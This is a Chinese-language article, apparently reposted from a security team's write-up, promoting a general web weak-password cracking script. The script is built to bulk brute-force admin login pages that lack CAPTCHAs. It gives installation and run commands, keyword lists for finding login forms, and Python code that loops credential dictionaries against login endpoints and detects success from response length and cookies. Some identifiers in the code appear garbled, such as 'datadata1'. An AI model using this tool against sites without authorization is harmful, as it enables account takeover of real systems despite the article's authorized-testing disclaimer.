| 副标题[/!--empirenews.page--] 注意:本脚本只是探讨通用web口令破解的可行性,所有测试请自行搭建靶机环境或者在拿到目标系统相关授权后再进行测试。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 
 工具介绍 通用的web弱口令破解脚本,旨在批量检测那些没有验证码的管理后台。 随着攻防演练和一些漏洞挖掘任务的增多,有时候需要大批量快速的检测一些网站后台安全性,特别是测试一些管理弱口令,这种难度不大但比较费时费力的工作就需要一个自动化的脚本来完成了。但目前的各种web口令破解工具大多是针对某个cms进行设计,或者类似burpsuite需要手工配置,没有见过能通用的破解工具。 因此就有了这个小工具——通用web弱口令破解脚本,配合另一个信息搜集工具 https://github.com/TideSec/FuzzScanner  可以进行批量快速刷分。 安装使用 安装使用都比较简单: 从Github上拖下来 git clone https://github.com/TideSec/web_pwd_common_crack 
 安装requirements.txt依赖 pip install -r requirements.txt 
 运行脚本即可 python web_pwd_crack.py url.txt 50   --> url.txt为待扫描URL地址列表,50为线程数,默认为50 
 url.txt为待检测URL地址,可以自己写个脚本批量从搜索引擎获取,也可以自己用目录枚举工具去搜集。 功能原理 1. 访问目标地址,分析关键字 原理非常low,就是从页面中提取表单,对表单中的内容进行检索,发现存在用户名、密码、username、pwd、pass之类的字段则认为是登录页面,然后提取参数组成data数据,发送给crack函数进行破解。 由于现在各种网站的请求包的多样性,目前没法做到像wvs那样能提取到所有的登录post,只是根据简单的关键字进行了提取。 logins =['用户名','密码','login','denglu','登录','user','pass','yonghu','mima','pwd','zhanghao','yonghu','name','email','account'] 
 在测试中还发现有时候搜索框会干扰结果,所以把搜索框又进行了排除 sous = ['检索','搜','search','查找','keyword','关键字'] 
 另外,目前不支持自动识别验证码,所以对验证码也进行了排除 yzms = ['验证码','点击更换','点击刷新','checkcode','valicode','code','captcha'] 
 2. 通过解析页面获取post地址及参数 def get_post_get_page(content,url):     form_action = str(content).split('n')[0]     # print form_action     soup = BS(form_action, "lxml")     url_path = ''     for x in re.findall(".*?/",url):         url_pathurl_path =  url_path+x      action_url = soup.form['action']     if str(action_url).startswith('http'):         path = action_url     else:         path = url_path+soup.form['action']     method = soup.form['method']     return path,method 
 3. 在获取相关参数和path后调用破解函数web_crack进行密码破解 def web_crack(method,path,data):     conn =  requests.session()     res0 = conn.get(path, headers=requests_headers(), allow_redirects=False,timeout=10,proxies = requests_proxies())     error_length,cookie_error_flag,dynamic_req_len = get_error_length(conn,method,path,data)     if dynamic_req_len:         return False,False      num = 0     success_flag = 0     dic_all = len(USERNAME_DIC)*len(PASSWORD_DIC)     for user_name in USERNAME_DIC:         for pass_word in PASSWORD_DIC:             datadata1 = data             # print data1             user_nameuser_name = user_name.strip()             pass_wordpass_word = pass_word.strip()             pass_word = str(pass_word.replace('{user}', user_name))             data2 = str(data1.replace('%7Buser_name%7D', user_name))             data2 = str(data2.replace('%7Bpass_word%7D', pass_word))              numnum = num+1              res = conn.post(url = path,data = data2, headers=requests_headers(), timeout=10,verify=False,allow_redirects=False,proxies = requests_proxies())             cur_length = len(res.content+str(res.headers))              if cookie_error_flag:  # cookie_error_flag表示每个数据包中都有cookie                 if cur_length!=error_length:                     success_flag =1                     return user_name,pass_word             elif 'Set-Cookie' in res.headers and cur_length!=error_length:                 success_flag =1                 return user_name,pass_word     if success_flag == 0:         return False,False 
 (编辑:92站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |